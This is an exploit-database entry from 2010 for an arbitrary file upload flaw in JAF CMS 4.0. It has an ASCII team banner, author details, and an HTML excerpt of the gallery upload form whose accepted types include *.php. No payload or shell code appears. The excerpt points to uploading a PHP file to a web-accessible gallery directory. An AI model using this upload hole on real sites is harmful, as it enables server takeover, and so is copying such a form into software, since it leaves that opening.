JAF CMS 4.0 Upload Exploit

2010-11-15T00:00:00
ID 1337DAY-ID-14844
Type zdt
Reporter indoushka
Modified 2010-11-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==========================
JAF CMS 4.0 Upload Exploit
==========================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

######################################################################## 

# Vendor: http://jaf-cms.sourceforge.net/

# Date: 2010-07-27 

# Author : indoushka 

# Inj3ct0r Team http://77.120.101.55/ 

# Thanks to : Dz-Ghost Team

# Contact : http://www.appinsecurity.com

# Tested on : windows SP2 Francais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 
-------------


          </table>
    <table border='0'>
    <tr><td width="50%" valign="top" class="note">
      <div>
        <font color="red"><b>NOTE :</b></font><br />Upload facility required "PHP_GD library support", to automate thumbnail image creation.
         If your server not support this facility, do manual upload for images and thumbnail via ftp etc.<br /><br />
        You've had to put images in directory :<br /><center>"<b>{webroot}/module/files/gallery/images/</b>"</center><br />

        and the thumbnail in directory :<br /><center>"<b>{webroot}/module/files/gallery/thumbs/</b>"</center></div><br />
      </div>
    </td><td valign="top" class="note">
                
      <div>
        Select an image file to upload ( *.GIF, *.JPG or *.PNG , *.php)<br />
        Max file size is set at 500 KB<br /><br />

        <form name="upload_form" method="post" enctype="multipart/form-data" action="?action=upload"> 
         <input TYPE="file" NAME="userfile" size="30" class="button" style="text-align: left" /><input type="submit" value="Upload" name="upload" class="button" />
        </form><br />
        
            </tr></table>
      <div>
            <hr size="1" noshade>
          <table>
            <tr>
              <td colspan="2" align="center"><h2>Gallery Images</h2></td>

            </tr>
          </table>



#  0day.today [2018-04-14]  #